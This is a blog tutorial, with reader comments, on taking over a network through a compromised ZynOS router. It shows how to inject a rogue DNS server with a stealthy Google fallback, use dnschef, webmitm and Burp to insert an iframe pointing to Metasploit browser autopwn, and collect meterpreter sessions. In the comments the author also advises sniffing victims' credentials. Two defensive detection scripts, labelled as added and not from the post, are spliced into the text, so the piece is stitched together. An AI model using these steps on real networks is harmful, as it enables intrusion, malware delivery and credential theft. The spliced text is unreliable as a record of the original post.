ZynOS – Part 2 ( Taking over the network )

Hello again 🙂

Let me recap from the last post. What I'm about to demonstrate here is the damage an attacker can do to your network once he has access to the router.

We have access to the router, but our goal is to get a foothold on the remote network. The port forwarding option is beautiful: we could scrape the network pool for internal IPs, forward ports like 445 and 139, and try to exploit them from our end. But imagine a network with 200 machines; that would definitely be time consuming, and even if you write a script to automate it, what makes you believe you would actually end up with meterpreter sessions?

So .. what’s the solution ?

Hmm, DNS is an interesting thing to look at, since we can hand the router a DNS server IP that the whole network will use!

Are we talking about DNS intercepting ? Hell yeah 😀

Here is a list of the tools we’re going to use :

Dnschef: a DNS proxy (read about it HERE)
Metasploit: how to install it on Ubuntu HERE
Webmitm: find out more about it HERE
Burp Suite: available HERE

- Attacking from Ubuntu (Metasploit, dnschef and webmitm) running on (IP:

- Burp Suite will be running at (IP:

First, I'll explain how I'm going to carry out the attack.

We're going to set up our dnschef proxy:

[Screenshot: Screen Shot 2014-01-18 at 1.30.27 PM]

./dnschef.py --interface --fakeip 

--interface: tells dnschef which interface it will listen on.

--fakeip: hijacks requests by returning this IP as the answer to every query.

The next step is to launch webmitm, which will handle the HTTP requests and responses. From there we'll tell webmitm to forward the traffic to the Burp Suite proxy, which will let us inject an iframe pointing at the Metasploit browser autopwn server.

[Screenshot: Screen Shot 2014-01-18 at 1.38.01 PM]

We have to configure Burp Suite so that it handles requests on port 80:

[Screenshot: Screen Shot 2014-01-18 at 1.40.00 PM]

The proxy listener has to be in invisible mode:

[Screenshot: Screen Shot 2014-01-18 at 1.40.16 PM]

Repeat these steps for port 443 to handle HTTPS traffic.

OK, so everything is ready now. I'll have to modify the scripts I provided in the previous post so that we can inject our DNS server.

[Screenshot: Screen Shot 2014-01-18 at 1.49.47 PM]

This way I injected my IP address as the first DNS server the router uses, and the second one is Google's. If we later want to stop the attack on the routers we have already injected, we just block the requests made to our DNS server; the router then automatically falls back to the second server, Google's, without showing any DNS resolution error on the victim's end.
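From the defender's side, the two steps above leave two signatures: a router whose primary resolver is unknown while its secondary is a well-known public one, and DNS answers in which unrelated names all resolve to the same address (what a blanket --fakeip proxy returns). The following check is an added example, not code from the post; the trusted and public resolver sets and the answer log are constructed sample data.

```python
from collections import defaultdict

# Resolvers this network expects its routers to hand out (constructed sample set).
TRUSTED_RESOLVERS = {"192.0.2.53", "8.8.8.8", "8.8.4.4"}
# Widely used public resolvers; the post leaves one of these as the secondary so
# victims see no resolution errors once the rogue primary stops answering.
PUBLIC_RESOLVERS = {"8.8.8.8", "8.8.4.4", "1.1.1.1", "9.9.9.9"}

# Constructed DNS answer log: (queried name, returned A record). Every unrelated
# name resolving to 198.51.100.7 is the signature of a blanket --fakeip proxy.
SAMPLE_ANSWERS = [
    ("www.example.com", "198.51.100.7"),
    ("mail.example.net", "198.51.100.7"),
    ("login.example.org", "198.51.100.7"),
    ("cdn.example.edu", "198.51.100.7"),
    ("news.example.info", "198.51.100.7"),
    ("intranet.example.com", "192.0.2.10"),
]


def audit_router_dns(resolvers):
    """Return findings for a router's ordered list of configured resolvers."""
    findings = []
    for i, ip in enumerate(resolvers):
        if ip not in TRUSTED_RESOLVERS:
            findings.append(f"resolver #{i + 1} {ip} is not in the trusted set")
    # The mixed configuration described in the post: unknown primary, public secondary.
    if (len(resolvers) >= 2 and resolvers[0] not in TRUSTED_RESOLVERS
            and resolvers[1] in PUBLIC_RESOLVERS):
        findings.append("unknown primary with public secondary: rogue-DNS pattern")
    return findings


def find_sinkhole_ip(answers, min_names=5):
    """Return the A record that at least min_names distinct names resolved to,
    or None. Tune min_names: shared hosting and CDNs legitimately map many
    names to one address, so corroborate with the resolver audit above."""
    names_per_ip = defaultdict(set)
    for qname, ip in answers:
        names_per_ip[ip].add(qname.lower().rstrip("."))
    for ip, names in names_per_ip.items():
        if len(names) >= min_names:
            return ip
    return None


if __name__ == "__main__":
    print(audit_router_dns(["198.51.100.7", "8.8.8.8"]))
    print(find_sinkhole_ip(SAMPLE_ANSWERS))
```

Run the resolver audit against the DNS settings pulled from each router's configuration, and the sinkhole check over the answers seen by a resolver log or passive DNS sensor.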

OK, so now we'll have to launch the browser autopwn module in Metasploit.

PS: I'll be using port 8080 because webmitm is already using port 80 to forward traffic.

[Screenshot: Screen Shot 2014-01-18 at 2.10.54 PM]

[Screenshot: Screen Shot 2014-01-18 at 2.12.09 PM]

It's loaded and waiting for victims to browse 🙂

OK, so from here we'll have to add the iframe injection to Burp Suite, so that when it gets a response for a page the victim requested, it injects an iframe pointing at “” where Metasploit is listening.
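A defender can look for exactly this modification in the bodies a client receives: an iframe whose source is a host other than the page's own. This is an added example, not the post's code; the HTML is constructed, and the documentation address 198.51.100.7 stands in for the injected listener.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page body as a victim's browser might receive it after the proxy
# has inserted a frame pointing at an off-host listener (198.51.100.7:8080 is
# a documentation address used as a stand-in).
SAMPLE_HTML = """<html><body><h1>Welcome</h1>
<iframe src="http://198.51.100.7:8080/" width="0" height="0"></iframe>
<iframe src="/help/widget"></iframe>
<iframe src="https://static.example.com/player"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the src attribute of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)


def foreign_iframes(html, page_host):
    """Return iframe src values whose host is neither page_host nor one of its
    subdomains. Relative sources stay on the page's own host and are ignored."""
    collector = IframeCollector()
    collector.feed(html)
    hits = []
    for src in collector.srcs:
        host = urlparse(src).hostname  # None for a relative src like /help/widget
        if host is None or host == page_host or host.endswith("." + page_host):
            continue
        hits.append(src)
    return hits


if __name__ == "__main__":
    print(foreign_iframes(SAMPLE_HTML, "example.com"))  # ['http://198.51.100.7:8080/']
```

Feed it each HTML response captured at the client or at a monitoring proxy together with the host that was requested; any hit deserves a look at the path the response took.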

[Screenshot: Screen Shot 2014-01-18 at 2.11.33 PM]

After injecting my DNS server into the victim's router using the scripts, and with everything from dnschef to Metasploit set up, let's follow what happens when a victim browses to a website.

[Screenshot: Screen Shot 2014-01-18 at 2.18.13 PM]

We got 3 meterpreter sessions :D


Any questions or comments, feel free to contact me. And as always: Happy Hacking 🙂


27 thoughts on “ZynOS – Part 2 ( Taking over the network )”

  1. Hi bro,
    very nice job...
    I have a question...
    What can I do if I want to sniff data such as cookies or passwords from the data in the router?


  2. I mean without using Metasploit... just sniffing data or phishing some website like Facebook...

    sorry for spam

    1. Hi, thanks for your comments. Well, I understand what you want to do, so what I recommend is to just follow the steps I provided and then launch Wireshark or any other packet sniffing software; you should then see the data, because basically all of the victim's traffic is going through your computer 🙂

      I hope this helps ..

      1. Thank you. I used dnschef and webmitm -d and then ran dsniff and it works well. Now I want to change the script because it uses a subnet CIDR... and I want to use an IP range:

        you use IPNetwork subnet:

        for ip in IPNetwork(''):

        and I want to use an IP range,
        for example:

        netaddr.iprange_to_cidrs(' ,'):

        any idea?

        Thank you brother 🙂

  3. 123 long live Algeria 😉
    Sorry because I'm so bad at English, and I want to learn from you if you want, but in Arabic.
    Is there any way to contact you?

  4. Nasro, can you make this tutorial into a short video please?
    I got some errors when I used dnschef.
    Thx 😉

  5. Hi bro, it's a great job and thanks for what you do 😉
    I have a problem: when I injected my IP into the DNS server route of the victim, it's not working? I don't understand that! I tried all ways, so can you explain it to me?!!

  6. Hi,
    it's great Python code, the one for the ZynOS attack... but I can't get results, as str1 is empty!! Or the result of decoded.php is something like “There was an error uploading the file, please try again!”, like when you access the page like this”
    Any help please?

  7. Hi Nassro,

    good work.

    While running the script I'm getting the following error:

    Traceback (most recent call last):
    File "C:\Users\raydan\Desktop\zynos-attacker-master\zynos-attacker-master\attack.py", line 1, in
    from netaddr import IPNetwork
    ImportError: No module named netaddr

  8. OK, so I got everything set up, but where do I find the IP for Burp Suite? And when I do browse, it comes up with Burp saying something. I also tried this and set up a server via SEToolkit, and set dnschef fakedomain=facebook.com. That did not work. I also tried setting up sslstrip but no joy. Thanks for this anyway.

  9. Hi. This is the only article I have found on this. I have some questions.
    Sorry if they are noob questions.
    I am running Kali Linux.
    Is this possible without running Burp on a different IP?
    Assuming I have a remote router's login, what IP would I put in the router's static DNS to point all client requests to my No-IP for SEToolkit attacks?

    If that is not possible, what IP can I put in there just to monitor traffic?

    Noobest question... How do I make my No-IP address a DNS server?
